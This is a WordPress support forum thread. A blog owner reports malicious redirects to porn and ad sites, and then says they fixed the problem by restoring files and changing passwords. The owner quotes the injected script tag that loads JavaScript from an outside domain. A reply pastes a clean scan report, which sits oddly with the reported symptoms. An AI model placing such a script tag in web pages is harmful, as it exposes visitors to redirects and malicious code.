migrationology
Member
Posted 1 year ago #
When I click on a blog post link, it sometimes (not always) says "the page you are looking for has move," and then redirects to a porn site or advertisement.
I have an unknown script code:
<script src="http://welcometotheglobalisnet.com/js.php?kk=25"></script>
that shows up in the quickpress box, on the dashboard of wordpress.
Any ideas of what this is or what I need to do to get rid of this?
My url is: http://migrationology.com (however right now my site is down 403 Forbidden, but I think that is just my server doing maintenance)
dd@sucuri.net
Member
Posted 1 year ago #
Site verified to be secure and malware-free.
Security report (no threats found):
Blacklisted: No
Malware: No
Malicious javascript: No
Drive-By Downloads: No
Anomaly detection: No
IE-only attacks: No
Malicious iframes: No
Suspicious redirections: No
Spam: No
migrationology
Member
Posted 1 year ago #
Thanks so much for all your help. I actually ended up restoring the files on my server to a few days before and then upgraded and changed all my passwords.
The searches are coming up negative now, so I'm re-submitting back to google.
Thanks for the help!